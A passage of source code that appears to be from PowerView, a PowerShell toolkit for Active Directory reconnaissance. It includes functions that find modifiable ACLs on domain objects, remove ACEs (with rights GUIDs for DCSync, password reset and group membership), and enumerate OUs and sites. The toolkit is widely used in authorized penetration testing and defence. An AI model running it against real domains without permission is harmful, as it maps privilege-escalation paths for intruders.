($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain }\n        if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential }\n        $Principals = Get-DomainObject @PrincipalSearcherArguments\n        if (-not $Principals) {\n            throw \"Unable to resolve principal: $PrincipalIdentity\"\n        }\n    }\n\n    PROCESS {\n        $TargetSearcherArguments['Identity'] = $TargetIdentity\n        $Targets = Get-DomainObject @TargetSearcherArguments\n\n        ForEach ($TargetObject in $Targets) {\n\n            $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None'\n            $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow'\n            $ACEs = @()\n\n            if ($RightsGUID) {\n                $GUIDs = @($RightsGUID)\n            }\n            else {\n                $GUIDs = Switch ($Rights) {\n                    # ResetPassword doesn't need to know the user's current password\n                    'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' }\n                    # allows for the modification of group membership\n                    'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }\n                    # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2\n                    # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2\n                    # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c\n                    #   when applied to a domain's ACL, allows for the use of DCSync\n                    'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'}\n                }\n            }\n\n            ForEach ($PrincipalObject in $Principals) {\n                Write-Verbose \"[Remove-DomainObjectAcl] Removing principal $($PrincipalObject.distinguishedname) '$Rights' from $($TargetObject.Properties.distinguishedname)\"\n\n                try {\n                    $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid)\n\n                    if ($GUIDs) {\n                        ForEach ($GUID in $GUIDs) {\n                            $NewGUID = New-Object Guid $GUID\n                            $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight'\n                            $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType\n                        }\n                    }\n                    else {\n                        # deault to GenericAll rights\n                        $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll'\n                        $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType\n                    }\n\n                    # remove all the specified ACEs from the specified object directory entry\n                    ForEach ($ACE in $ACEs) {\n                        Write-Verbose \"[Remove-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)\"\n                        $TargetEntry = $TargetObject.GetDirectoryEntry()\n                        $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl'\n                        $TargetEntry.PsBase.ObjectSecurity.RemoveAccessRule($ACE)\n                        $TargetEntry.PsBase.CommitChanges()\n                    }\n                }\n                catch {\n                    Write-Verbose \"[Remove-DomainObjectAcl] Error removing principal $($PrincipalObject.distinguishedname) '$Rights' from $($TargetObject.Properties.distinguishedname) : $_\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction Find-InterestingDomainAcl {\n<#\n.SYNOPSIS\n\nFinds object ACLs in the current (or specified) domain with modification\nrights set to non-built in objects.\n\nThanks Sean Metcalf (@pyrotek3) for the idea and guidance.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName  \n\n.DESCRIPTION\n\nThis function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,\nand for each returned ACE entry it checks if principal security identifier\nis *-1000 (meaning the account is not built in), and also checks if the rights for\nthe ACE mean the object can be modified by the principal. If these conditions are met,\nthen the security identifier SID is translated, the domain object is retrieved, and\nadditional IdentityReference* information is appended to the output object.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER ResolveGUIDs\n\nSwitch. Resolve GUIDs to their display names.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nFind-InterestingDomainAcl\n\nFinds interesting object ACLS in the current domain.\n\n.EXAMPLE\n\nFind-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs\n\nFinds interesting object ACLS in the ev.testlab.local domain and\nresolves rights GUIDs to display names.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nFind-InterestingDomainAcl -Credential $Cred -ResolveGUIDs\n\n.OUTPUTS\n\nPowerView.ACL\n\nCustom PSObject with ACL entries.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.ACL')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DomainName', 'Name')]\n        [String]\n        $Domain,\n\n        [Switch]\n        $ResolveGUIDs,\n\n        [String]\n        [ValidateSet('All', 'ResetPassword', 'WriteMembers')]\n        $RightsFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $ACLArguments = @{}\n        if ($PSBoundParameters['ResolveGUIDs']) { $ACLArguments['ResolveGUIDs'] = $ResolveGUIDs }\n        if ($PSBoundParameters['RightsFilter']) { $ACLArguments['RightsFilter'] = $RightsFilter }\n        if ($PSBoundParameters['LDAPFilter']) { $ACLArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['SearchBase']) { $ACLArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential }\n\n        $ObjectSearcherArguments = @{\n            'Properties' = 'samaccountname,objectclass'\n            'Raw' = $True\n        }\n        if ($PSBoundParameters['Server']) { $ObjectSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $ObjectSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $ObjectSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $ObjectSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $ObjectSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $ObjectSearcherArguments['Credential'] = $Credential }\n\n        $ADNameArguments = @{}\n        if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }\n        if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }\n\n        # ongoing list of built-up SIDs\n        $ResolvedSIDs = @{}\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Domain']) {\n            $ACLArguments['Domain'] = $Domain\n            $ADNameArguments['Domain'] = $Domain\n        }\n\n        Get-DomainObjectAcl @ACLArguments | ForEach-Object {\n\n            if ( ($_.ActiveDirectoryRights -match 'GenericAll|Write|Create|Delete') -or (($_.ActiveDirectoryRights -match 'ExtendedRight') -and ($_.AceQualifier -match 'Allow'))) {\n                # only process SIDs > 1000\n                if ($_.SecurityIdentifier.Value -match '^S-1-5-.*-[1-9]\\d{3,}$') {\n                    if ($ResolvedSIDs[$_.SecurityIdentifier.Value]) {\n                        $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass = $ResolvedSIDs[$_.SecurityIdentifier.Value]\n\n                        $InterestingACL = New-Object PSObject\n                        $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN\n                        $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier\n                        $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights\n                        if ($_.ObjectAceType) {\n                            $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType\n                        }\n                        else {\n                            $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None'\n                        }\n                        $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags\n                        $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType\n                        $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags\n                        $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier\n                        $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName\n                        $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain\n                        $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN\n                        $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass\n                        $InterestingACL\n                    }\n                    else {\n                        $IdentityReferenceDN = Convert-ADName -Identity $_.SecurityIdentifier.Value -OutputType DN @ADNameArguments\n                        # \"IdentityReferenceDN: $IdentityReferenceDN\"\n\n                        if ($IdentityReferenceDN) {\n                            $IdentityReferenceDomain = $IdentityReferenceDN.SubString($IdentityReferenceDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                            # \"IdentityReferenceDomain: $IdentityReferenceDomain\"\n                            $ObjectSearcherArguments['Domain'] = $IdentityReferenceDomain\n                            $ObjectSearcherArguments['Identity'] = $IdentityReferenceDN\n                            # \"IdentityReferenceDN: $IdentityReferenceDN\"\n                            $Object = Get-DomainObject @ObjectSearcherArguments\n\n                            if ($Object) {\n                                $IdentityReferenceName = $Object.Properties.samaccountname[0]\n                                if ($Object.Properties.objectclass -match 'computer') {\n                                    $IdentityReferenceClass = 'computer'\n                                }\n                                elseif ($Object.Properties.objectclass -match 'group') {\n                                    $IdentityReferenceClass = 'group'\n                                }\n                                elseif ($Object.Properties.objectclass -match 'user') {\n                                    $IdentityReferenceClass = 'user'\n                                }\n                                else {\n                                    $IdentityReferenceClass = $Null\n                                }\n\n                                # save so we don't look up more than once\n                                $ResolvedSIDs[$_.SecurityIdentifier.Value] = $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass\n\n                                $InterestingACL = New-Object PSObject\n                                $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN\n                                $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier\n                                $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights\n                                if ($_.ObjectAceType) {\n                                    $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType\n                                }\n                                else {\n                                    $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None'\n                                }\n                                $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags\n                                $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType\n                                $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags\n                                $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier\n                                $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName\n                                $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain\n                                $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN\n                                $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass\n                                $InterestingACL\n                            }\n                        }\n                        else {\n                            Write-Warning \"[Find-InterestingDomainAcl] Unable to convert SID '$($_.SecurityIdentifier.Value )' to a distinguishedname with Convert-ADName\"\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainOU {\n<#\n.SYNOPSIS\n\nSearch for all organization units (OUs) or specific OU objects in AD.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty  \n\n.DESCRIPTION\n\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\nLDAP filter based on targeting/filter parameters, and searches for all objects\nmatching the criteria. To only return specific properties, use\n\"-Properties whencreated,usnchanged,...\". By default, all OU objects for\nthe current domain are returned.\n\n.PARAMETER Identity\n\nAn OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or\nGUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). Wildcards accepted.\n\n.PARAMETER GPLink\n\nOnly return OUs with the specified GUID in their gplink property.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.EXAMPLE\n\nGet-DomainOU\n\nReturns the current OUs in the domain.\n\n.EXAMPLE\n\nGet-DomainOU *admin* -Domain testlab.local\n\nReturns all OUs with \"admin\" in their name in the testlab.local domain.\n\n.EXAMPLE\n\nGet-DomainOU -GPLink \"F260B76D-55C8-46C5-BEF1-9016DD98E272\"\n\nReturns all OUs with linked to the specified group policy object.\n\n.EXAMPLE\n\n\"*admin*\",\"*server*\" | Get-DomainOU\n\nSearch for OUs with the specific names.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainOU -Credential $Cred\n\n.OUTPUTS\n\nPowerView.OU\n\nCustom PSObject with translated OU property fields.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.OU')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        [Alias('GUID')]\n        $GPLink,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $OUSearcher = Get-DomainSearcher @SearcherArguments\n    }\n\n    PROCESS {\n        if ($OUSearcher) {\n            $IdentityFilter = ''\n            $Filter = ''\n            $Identity | Where-Object {$_} | ForEach-Object {\n                $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n                if ($IdentityInstance -match '^OU=.*') {\n                    $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                    if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                        # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                        #   and rebuild the domain searcher\n                        $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        Write-Verbose \"[Get-DomainOU] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                        $SearcherArguments['Domain'] = $IdentityDomain\n                        $OUSearcher = Get-DomainSearcher @SearcherArguments\n                        if (-not $OUSearcher) {\n                            Write-Warning \"[Get-DomainOU] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                        }\n                    }\n                }\n                else {\n                    try {\n                        $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\\$1'\n                        $IdentityFilter += \"(objectguid=$GuidByteString)\"\n                    }\n                    catch {\n                        $IdentityFilter += \"(name=$IdentityInstance)\"\n                    }\n                }\n            }\n            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n                $Filter += \"(|$IdentityFilter)\"\n            }\n\n            if ($PSBoundParameters['GPLink']) {\n                Write-Verbose \"[Get-DomainOU] Searching for OUs with $GPLink set in the gpLink property\"\n                $Filter += \"(gplink=*$GPLink*)\"\n            }\n\n            if ($PSBoundParameters['LDAPFilter']) {\n                Write-Verbose \"[Get-DomainOU] Using additional LDAP filter: $LDAPFilter\"\n                $Filter += \"$LDAPFilter\"\n            }\n\n            $OUSearcher.filter = \"(&(objectCategory=organizationalUnit)$Filter)\"\n            Write-Verbose \"[Get-DomainOU] Get-DomainOU filter string: $($OUSearcher.filter)\"\n\n            if ($PSBoundParameters['FindOne']) { $Results = $OUSearcher.FindOne() }\n            else { $Results = $OUSearcher.FindAll() }\n            $Results | Where-Object {$_} | ForEach-Object {\n                if ($PSBoundParameters['Raw']) {\n                    # return raw result objects\n                    $OU = $_\n                }\n                else {\n                    $OU = Convert-LDAPProperty -Properties $_.Properties\n                }\n                $OU.PSObject.TypeNames.Insert(0, 'PowerView.OU')\n                $OU\n            }\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Get-DomainOU] Error disposing of the Results object: $_\"\n                }\n            }\n            $OUSearcher.dispose()\n        }\n    }\n}\n\n\nfunction Get-DomainSite {\n<#\n.SYNOPSIS\n\nSearch for all sites or specific site objects in AD.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty  \n\n.DESCRIPTION\n\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\nLDAP filter based on targeting/filter parameters, and searches for all objects\nmatching the criteria. To only return specific properties, use\n\"-Properties whencreated,usnchanged,...\". By default, all site objects for\nthe current domain are returned.\n\n.PARAMETER Identity\n\nAn site name (e.g. Test-Site), DistinguishedName (e.g. CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or\nGUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted.\n\n.PARAMETER GPLink\n\nOnly return sites with the specified GUID in their gplink property.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.EXAMPLE\n\nGet-DomainSite\n\nReturns the current sites in the domain.\n\n.EXAMPLE\n\nGet-DomainSite *admin* -Domain testlab.local\n\nReturns all sites with \"admin\" in their name in the testlab.local domain.\n\n.EXAMPLE\n\nGet-DomainSite -GPLink \"F260B76D-55C8-46C5-BEF1-9016DD98E272\"\n\nReturns all sites with linked to the specified group policy object.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainSite -Credential $Cred\n\n.OUTPUTS\n\nPowerView.Site\n\nCustom PSObject with translated site property fields.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.Site')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        [Alias('GUID')]\n        $GPLink,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'SearchBasePrefix' = 'CN=Sites,CN=Configuration'\n        }\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $SiteSearcher = Get-DomainSearcher @SearcherArguments\n    }\n\n    PROCESS {\n        if ($SiteSearcher) {\n            $IdentityFilter = ''\n            $Filter = ''\n            $Identity | Where-Object {$_} | ForEach-Object {\n                $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n                if ($IdentityInstance -match '^CN=.*') {\n                    $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                    if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                        # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                        #   and rebuild the domain searcher\n                        $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        Write-Verbose \"[Get-DomainSite] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                        $SearcherArguments['Domain'] = $IdentityDomain\n                        $SiteSearcher = Get-DomainSearcher @SearcherArguments\n                        if (-not $SiteSearcher) {\n                            Write-Warning \"[Get-DomainSite] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                        }\n                    }\n                }\n                else {\n                    try {\n                        $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\\$1'\n                        $IdentityFilter += \"(objectguid=$GuidByteString)\"\n                    }\n                    catch {\n                        $IdentityFilter += \"(name=$IdentityInstance)\"\n                    }\n                }\n            }\n            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n                $Filter += \"(|$IdentityFilter)\"\n            }\n\n            if ($PSBoundParameters['GPLink']) {\n                Write-Verbose \"[Get-DomainSite] Searching for sites with $GPLink set in the gpLink property\"\n                $Filter += 